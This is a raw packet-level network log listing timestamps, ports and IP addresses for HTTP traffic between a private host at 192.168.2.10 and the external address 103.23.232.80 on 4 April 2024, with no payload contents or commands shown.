Apr 4, 2024 17:49:07.197618008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197642088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197691917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197707891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197726011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197734118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197746992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197761059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197782993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197803974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197823048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197844028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197861910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197881937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197887897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197916031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197938919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197954893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.197973967 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.197994947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198029041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198048115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198062897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198085070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198084116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198137999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198158026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198177099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198177099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198198080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198216915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198218107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198254108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198254108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198306084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198338985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198358059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198375940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198376894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198399067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198432922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198452950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198472023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198487043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198492050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198510885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198512077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198564053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198581934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198601007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198601961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198621035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198621988 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198656082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198690891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198709011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198728085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198745966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198764086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198770046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198796988 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198832035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198851109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198884964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198905945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198921919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.198966026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.198997974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199016094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199029922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199031115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199050903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199064970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199069023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199088097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199103117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199147940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199162960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199181080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199197054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199201107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199219942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199220896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199239969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199279070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199279070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199297905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199316025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199332952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199337006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199359894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199388027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199421883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199460030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199491024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199512005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199531078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199547052 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199561119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199570894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199604034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199623108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199640036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199676991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199693918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199712992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199734926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199737072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199752092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199752092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199769974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199784040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199806929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199841022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199860096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199875116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199877977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199897051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.199933052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199950933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199971914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.199986935 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200011015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200012922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200028896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200056076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200064898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200071096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200089931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200109005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200128078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200146914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200150013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200150013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200172901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200182915 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200192928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200212002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200246096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200249910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200268984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200288057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200304985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200314999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200320005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200333118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200366974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200467110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200536966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200555086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200573921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200577021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200596094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200613022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200613022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200638056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200655937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200670004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200675011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200695038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200715065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200731039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200751066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200763941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200783014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200786114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200802088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200839996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200856924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200874090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200910091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200913906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200932980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200949907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200962067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.200968981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200987101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.200997114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201024055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201041937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201059103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201078892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201097012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201132059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201132059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201150894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201169014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201189041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201200962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201225042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201240063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201258898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201277018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201282024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201313972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201317072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201375961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201395988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201428890 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201447964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201464891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201483965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201503038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201503992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201522112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201540947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201615095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201632023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201647997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201651096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201669931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201687098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201703072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201721907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201739073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201761961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201777935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201795101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201812983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201828003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201853037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201869965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201888084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201906919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201930046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.201962948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201977968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.201996088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202011108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202034950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202050924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202069998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202085018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202109098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202111006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202126026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202146053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202163935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202182055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202183008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202202082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202205896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202220917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202231884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202258110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202275991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202294111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202322960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202331066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202348948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202367067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202383995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202403069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202405930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202424049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202440023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202457905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202470064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202477932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202548981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202568054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202586889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202590942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202610016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202626944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202661037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202702045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202703953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202766895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202785015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202800989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202805042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202816010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202826023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202855110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202874899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202891111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202893972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202914000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202918053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202949047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.202970982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.202986956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203003883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203035116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203074932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203092098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203109980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203125000 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203129053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203140974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203149080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203166008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203178883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203183889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203202963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203221083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203257084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203274012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203291893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203310013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203310013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203330040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203330994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203365088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203366041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203385115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203419924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203454971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203455925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203474045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203491926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203511000 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203526020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203547001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203584909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203603029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203639030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203656912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203675032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203695059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203715086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203732014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203751087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203836918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203852892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203871965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203890085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203908920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203916073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203927040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203946114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203958035 CEST	49730	80	192.168.2.10	103.23.232.80
